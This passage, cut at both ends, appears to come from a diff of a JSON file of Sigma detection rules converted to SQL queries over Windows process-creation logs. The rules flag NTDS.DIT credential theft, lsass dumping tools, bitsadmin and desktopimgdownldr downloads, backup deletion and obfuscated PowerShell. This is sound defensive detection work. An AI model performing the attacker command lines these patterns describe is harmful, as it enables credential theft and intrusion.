((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND ParentProcessName LIKE '%\\\\7zFM.exe' ESCAPE '\\') AND NOT (((CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% 
/k %' ESCAPE '\\' OR CommandLine LIKE '% /r %' ESCAPE '\\')) OR (CommandLine = '')))" ], - "filename": "proc_creation_win_powershell_aadinternals_cmdlets_execution.yml" + "filename": "proc_creation_win_exploit_cve_2022_29072_7zip.yml" }, { - "title": "HackTool - SILENTTRINITY Stager Execution", - "id": "03552375-cc2c-4883-bbe4-7958d5a980be", - "status": "test", - "description": "Detects SILENTTRINITY stager use via PE metadata", - "author": "Aleksey Potapov, oscd.community", - "tags": [ - "attack.command_and_control", - "attack.t1071" - ], + "title": "PUA - AdvancedRun Suspicious Execution", + "id": "fa00b701-44c6-4679-994d-5a18afa8a707", + "status": "experimental", + "description": "Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND Description LIKE '%st2stager%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%/EXEFilename%' ESCAPE '\\' OR CommandLine LIKE '%/CommandLine%' ESCAPE '\\') AND ((CommandLine LIKE '% /RunAs 8 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 4 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 10 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 11 %' ESCAPE '\\') OR (CommandLine LIKE '%/RunAs 8' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 4' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 10' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 11' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_silenttrinity_stager.yml" + "filename": "proc_creation_win_pua_advancedrun_priv_user.yml" }, { - "title": "Suspicious Usage Of ShellExec_RunDLL", - "id": "d87bd452-6da1-456e-8155-7dc988157b7d", + "title": "File Download Via Bitsadmin To An Uncommon Target Folder", + "id": "6e30c82f-a9f8-4aab-b79c-7c12bce6f248", "status": 
"experimental", - "description": "Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of bitsadmin downloading a file to uncommon target folder", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%ShellExec\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%odbcconf%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%iex%' ESCAPE '\\' OR CommandLine LIKE '%comspec%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_susp_shellexec_execution.yml" + "filename": "proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml" }, { - "title": "Potential File Overwrite Via Sysinternals SDelete", - 
"id": "a4824fca-976f-4964-b334-0621379e84c4", - "status": "experimental", - "description": "Detects the use of SDelete to erase a file not the free space", - "author": "frack113", + "title": "TAIDOOR RAT DLL Load", + "id": "d1aa3382-abab-446f-96ea-4de52908210b", + "status": "test", + "description": "Detects specific process characteristics of Chinese TAIDOOR RAT malware load", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1485" + "attack.execution", + "attack.t1055.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'sdelete.exe' AND NOT ((CommandLine LIKE '% -h%' ESCAPE '\\' OR CommandLine LIKE '% -c%' ESCAPE '\\' OR CommandLine LIKE '% -z%' ESCAPE '\\' OR CommandLine LIKE '% /\\?%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%dll,MyStart%' ESCAPE '\\' OR CommandLine LIKE '%dll MyStart%' ESCAPE '\\') OR (CommandLine LIKE '% MyStart' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sysinternals_sdelete.yml" + "filename": "proc_creation_win_apt_taidoor.yml" }, { - "title": "PUA - Advanced Port Scanner Execution", - "id": "54773c5f-f1cc-4703-9126-2f797d96a69d", - "status": "experimental", - "description": "Detects the use of Advanced Port Scanner.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Remote Access Tool - ScreenConnect Suspicious Execution", + "id": "75bfe6e6-cd8e-429e-91d3-03921e1d7962", + "status": "test", + "description": "Detects ScreenConnect program starts that establish a remote access to that system (not meeting, not remote support)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1046", - "attack.t1135" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ - "Legitimate administrative use", - "Tools 
with similar commandline (very rare)" + "Legitimate use by administrative staff" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\advanced\\_port\\_scanner%' ESCAPE '\\' OR OriginalFileName LIKE '%advanced\\_port\\_scanner%' ESCAPE '\\' OR Description LIKE '%Advanced Port Scanner%' ESCAPE '\\') OR (CommandLine LIKE '%/portable%' ESCAPE '\\' AND CommandLine LIKE '%/lng%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%e=Access&%' ESCAPE '\\' AND CommandLine LIKE '%y=Guest&%' ESCAPE '\\' AND CommandLine LIKE '%&p=%' ESCAPE '\\' AND CommandLine LIKE '%&c=%' ESCAPE '\\' AND CommandLine LIKE '%&k=%' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_advanced_port_scanner.yml" + "filename": "proc_creation_win_remote_access_tools_screenconnect_access.yml" }, { - "title": "SystemStateBackup Deleted Using Wbadmin.EXE", - "id": "89f75308-5b1b-4390-b2d8-d6b2340efaf8", + "title": "Invoke-Obfuscation STDIN+ Launcher", + "id": "6c96fc76-0eb1-11eb-adc1-0242ac120002", "status": "test", - "description": "Deletes the Windows systemstatebackup using wbadmin.exe.\nThis technique is used by numerous ransomware families.\nThis may only be successful on server platforms that have Windows Backup enabled.\n", - "author": "frack113", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete %' ESCAPE '\\' AND CommandLine LIKE '%systemstatebackup %' ESCAPE '\\' AND 
CommandLine LIKE '%-keepVersions:0%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (CommandLine LIKE '%noexit%' ESCAPE '\\' OR (CommandLine LIKE '%input%' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wbadmin_delete_systemstatebackup.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_stdin.yml" }, { - "title": "Suspicious Command With Teams Objects Paths", - "id": "d2eb17db-1d39-41dc-b57f-301f6512fa75", + "title": "Suspicious Process Patterns NTDS.DIT Exfil", + "id": "8bc64091-6875-4881-aaf9-7bd25b5dda08", "status": "experimental", - "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", - "author": "@SerkinValery", + "description": "Detects suspicious process patterns used in NTDS.DIT exfiltration", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1528" + "attack.t1003.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\NTDSDump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NTDSDumpEx.exe' ESCAPE '\\') OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND CommandLine LIKE '%system.hiv%' ESCAPE '\\') OR CommandLine LIKE '%NTDSgrab.ps1%' ESCAPE '\\') OR (CommandLine LIKE '%ac i ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR 
(CommandLine LIKE '%/c copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\') OR (CommandLine LIKE '%activate instance ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%ntds.dit%' ESCAPE '\\')) OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND ((ParentProcessName LIKE '%\\\\apache%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\apache%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tomcat%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_teams_suspicious_command_line_cred_access.yml" + "filename": "proc_creation_win_susp_ntds.yml" }, { - "title": "Suspicious Firewall Configuration Discovery Via Netsh.EXE", - "id": "0e4164da-94bc-450d-a7be-a4b176179f1f", + "title": "CMD Shell Output Redirect", + "id": "4f4eaa9f-5ad4-410c-a4be-bc6132b0175a", "status": "experimental", - "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", - "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", + "description": "Detects the use of the redirection character \">\" to redicrect information in commandline", + "author": "frack113", "tags": [ "attack.discovery", - "attack.t1016" + "attack.t1082" ], "falsepositives": [ - "Administrative activity" + "Internet Download Manager extensions use named pipes and redirection via CLI. 
Filter it out if you use it in your environment" ], "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%netsh %' ESCAPE '\\' AND CommandLine LIKE '%show %' ESCAPE '\\' AND CommandLine LIKE '%firewall %' ESCAPE '\\' AND (CommandLine LIKE '%config %' ESCAPE '\\' OR CommandLine LIKE '%state %' ESCAPE '\\' OR CommandLine LIKE '%rule %' ESCAPE '\\' OR CommandLine LIKE '%name=all%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((OriginalFileName = 'Cmd.Exe' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND CommandLine LIKE '%>%' ESCAPE '\\') AND NOT (((CommandLine LIKE '%C:\\\\Program Files (x86)\\\\Internet Download Manager\\\\IDMMsgHost.exe%' ESCAPE '\\' OR CommandLine LIKE '%chrome-extension://%' ESCAPE '\\' OR CommandLine LIKE '%\\\\.\\\\pipe\\\\chrome.nativeMessaging%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_netsh_fw_rules_discovery.yml" + "filename": "proc_creation_win_cmd_redirect.yml" }, { - "title": "PUA - Seatbelt Execution", - "id": "38646daa-e78f-4ace-9de0-55547b2d30da", + "title": "Suspicious High IntegrityLevel Conhost Legacy Option", + "id": "3037d961-21e9-4732-b27a-637bcc7bf539", "status": "experimental", - "description": "Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "ForceV1 asks for information directly from the kernel space. Conhost connects to the console application. 
High IntegrityLevel means the process is running with elevated privileges, such as an Administrator context.", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1526", - "attack.t1087", - "attack.t1083" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Unlikely" + "Very Likely, including launching cmd.exe via Run As Administrator" ], - "level": "high", + "level": "informational", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Seatbelt.exe' ESCAPE '\\' OR OriginalFileName = 'Seatbelt.exe' OR Description = 'Seatbelt' OR (CommandLine LIKE '% DpapiMasterKeys%' ESCAPE '\\' OR CommandLine LIKE '% InterestingProcesses%' ESCAPE '\\' OR CommandLine LIKE '% InterestingFiles%' ESCAPE '\\' OR CommandLine LIKE '% CertificateThumbprints%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumBookmarks%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumHistory%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumPresence%' ESCAPE '\\' OR CommandLine LIKE '% CloudCredentials%' ESCAPE '\\' OR CommandLine LIKE '% CredEnum%' ESCAPE '\\' OR CommandLine LIKE '% CredGuard%' ESCAPE '\\' OR CommandLine LIKE '% FirefoxHistory%' ESCAPE '\\' OR CommandLine LIKE '% ProcessCreationEvents%' ESCAPE '\\')) OR ((CommandLine LIKE '% -group=misc%' ESCAPE '\\' OR CommandLine LIKE '% -group=remote%' ESCAPE '\\' OR CommandLine LIKE '% -group=chromium%' ESCAPE '\\' OR CommandLine LIKE '% -group=slack%' ESCAPE '\\' OR CommandLine LIKE '% -group=system%' ESCAPE '\\' OR CommandLine LIKE '% -group=user%' ESCAPE '\\' OR CommandLine LIKE '% -group=all%' ESCAPE '\\') AND CommandLine LIKE '% -outputfile=%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel = 'High' AND CommandLine LIKE '%conhost.exe%' ESCAPE '\\' AND CommandLine LIKE '%0xffffffff%' ESCAPE '\\' AND CommandLine LIKE '%-ForceV1%' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_seatbelt.yml" + "filename": 
"proc_creation_win_conhost_legacy_option.yml" }, { - "title": "Persistence Via TypedPaths - CommandLine", - "id": "ec88289a-7e1a-4cc3-8d18-bd1f60e4b9ba", + "title": "Stop Windows Service Via PowerShell Stop-Service", + "id": "c49c5062-0966-4170-9efd-9968c913a6cf", "status": "experimental", - "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry via the commandline. Which might indicate persistence attempt", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the stopping of a Windows service", + "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.impact", + "attack.t1489" ], "falsepositives": [ - "Unknown" + "There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. Filter legitimate activity accordingly" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\TypedPaths%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND CommandLine LIKE '%Stop-Service %' ESCAPE '\\')" ], - "filename": "proc_creation_win_registry_typed_paths_persistence.yml" + "filename": "proc_creation_win_powershell_stop_service.yml" }, { - "title": "DLL Sideloading by VMware Xfer Utility", - "id": "ebea773c-a8f1-42ad-a856-00cb221966e8", + "title": "Suspicious Group And Account Reconnaissance Activity Using Net.EXE", + "id": "d95de845-b83c-4a9a-8a6a-4fc802ebf6c0", "status": "experimental", - "description": "Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an 
attempt to sideload arbitrary DLL", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE", + "author": "Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.discovery", + "attack.t1087.001", + "attack.t1087.002" ], "falsepositives": [ - "Unlikely" + "Inventory tool runs", + "Administrative activity" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND ((((CommandLine LIKE '% group %' ESCAPE '\\' OR CommandLine LIKE '% localgroup %' ESCAPE '\\') AND (CommandLine LIKE '%domain admins%' ESCAPE '\\' OR CommandLine LIKE '% administrator%' ESCAPE '\\' OR CommandLine LIKE '% administrateur%' ESCAPE '\\' OR CommandLine LIKE '%enterprise admins%' ESCAPE '\\' OR CommandLine LIKE '%Exchange Trusted Subsystem%' ESCAPE '\\' OR CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\' OR CommandLine LIKE '% /do%' ESCAPE '\\')) AND NOT (CommandLine LIKE '% /add%' ESCAPE '\\')) OR (CommandLine LIKE '% accounts %' ESCAPE '\\' AND CommandLine LIKE '% /do%' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_net_groups_and_accounts_recon.yml" + }, + { + "title": "Suspicious PowerShell Child Processes", + "id": "e4b6d2a7-d8a4-4f19-acbd-943c16d90647", + "status": "experimental", + "description": "Detects suspicious child processes spawned by PowerShell", + "author": "Florian Roth (Nextron Systems), Tim Shelton", + "falsepositives": [ + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND 
Channel = 'Security') AND NewProcessName LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_dll_sideload_vmware_xfer.yml" + "filename": "proc_creation_win_powershell_susp_child_processes.yml" }, { - "title": "Netsh Allow Group Policy on Microsoft Defender Firewall", - "id": "347906f3-e207-4d18-ae5b-a9403d6bcdef", + "title": "Fake Instance Of Hxtsr.exe", + "id": "4e762605-34a8-406d-b72e-c1a089313320", "status": "test", - "description": "Adversaries may modify system firewalls in order to bypass controls limiting network usage", - "author": "frack113", + "description": "HxTsr.exe is a Microsoft 
compressed executable file called Microsoft Outlook Communications.\nHxTsr.exe is part of Outlook apps, because it resides in a hidden \"WindowsApps\" subfolder of \"C:\\Program Files\".\nIts path includes a version number, e.g., \"C:\\Program Files\\WindowsApps\\microsoft.windowscommunicationsapps_17.7466.41167.0_x64__8wekyb3d8bbwe\\HxTsr.exe\".\nAny instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe\n", + "author": "Sreeman", "tags": [ "attack.defense_evasion", - "attack.t1562.004" + "attack.t1036" ], "falsepositives": [ - "Legitimate administration activity" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%group=%' ESCAPE '\\' AND CommandLine LIKE '%new%' ESCAPE '\\' AND CommandLine LIKE '%enable=Yes%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName = 'hxtsr.exe' AND NOT (CurrentDirectory LIKE 'C:\\\\program files\\\\windowsapps\\\\microsoft.windowscommunicationsapps\\_%' ESCAPE '\\' AND CurrentDirectory LIKE '%\\\\hxtsr.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_netsh_fw_enable_group_rule.yml" + "filename": "proc_creation_win_hxtsr_masquerading.yml" }, { - "title": "Greedy File Deletion Using Del", - "id": "204b17ae-4007-471b-917b-b917b315c5db", + "title": "Remote File Download via Desktopimgdownldr Utility", + "id": "214641c2-c579-4ecb-8427-0cf19df6842e", "status": "experimental", - "description": "Detects execution of the \"del\" builtin command to remove files using greedy/wildcard expression. 
This is often used by malware to delete content of folders that perhaps contains the initial malware infection or to delete evidence.", - "author": "frack113", + "description": "Detects the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil.", + "author": "Tim Rauch", "tags": [ - "attack.defense_evasion", - "attack.t1070.004" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%del %' ESCAPE '\\' OR CommandLine LIKE '%erase %' ESCAPE '\\') AND (CommandLine LIKE '%\\\\\\*.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\\\*.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\desktopimgdownldr.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\desktopimgdownldr.exe' ESCAPE '\\' AND CommandLine LIKE '%/lockscreenurl:http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_del_greedy_deletion.yml" + "filename": "proc_creation_win_desktopimgdownldr_remote_file_download.yml" }, { - "title": "HackTool - Dumpert Process Dumper Execution", - "id": "2704ab9e-afe2-4854-a3b1-0c0706d03578", - "status": "test", - "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", + "title": "HackTool - SysmonEOP Execution", + "id": "8a7e90c5-fe6e-45dc-889e-057fe4378bd9", + "status": "experimental", + "description": "Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "cve.2022.41120", + "attack.t1068", + "attack.privilege_escalation" ], "falsepositives": [ - "Very unlikely" + "Unlikely" ], 
"level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Hashes LIKE '%09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR CommandLine LIKE '%Dumpert.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SysmonEOP.exe' ESCAPE '\\' OR Hashes IN ('IMPHASH=22F4089EB8ABA31E1BB162C6D9BF72E5', 'IMPHASH=5123FA4C4384D431CD0D893EEB49BBEC') OR Imphash IN ('22f4089eb8aba31e1bb162c6d9bf72e5', '5123fa4c4384d431cd0d893eeb49bbec')))" ], - "filename": "proc_creation_win_hktl_dumpert.yml" + "filename": "proc_creation_win_hktl_sysmoneop.yml" }, { - "title": "Suspicious Execution of Systeminfo", - "id": "0ef56343-059e-4cb6-adc1-4c3c967c5e46", - "status": "experimental", - "description": "Detects usage of the \"systeminfo\" command to retrieve information", - "author": "frack113", + "title": "Potential Dtrack RAT Activity", + "id": "f1531fa4-5b84-4342-8f68-9cf3fdbd83d4", + "status": "stable", + "description": "Detects potential Dtrack RAT activity via specific process patterns", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1082" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "low", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR OriginalFileName = 'sysinfo.exe'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%ping -n %' ESCAPE '\\' AND CommandLine LIKE '% echo EEEE > %' ESCAPE '\\') OR (CommandLine LIKE '%ipconfig /all%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\res.ip%' ESCAPE '\\') OR (CommandLine LIKE '%interface ip show config%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\netsh.res%' ESCAPE '\\')))" ], - "filename": 
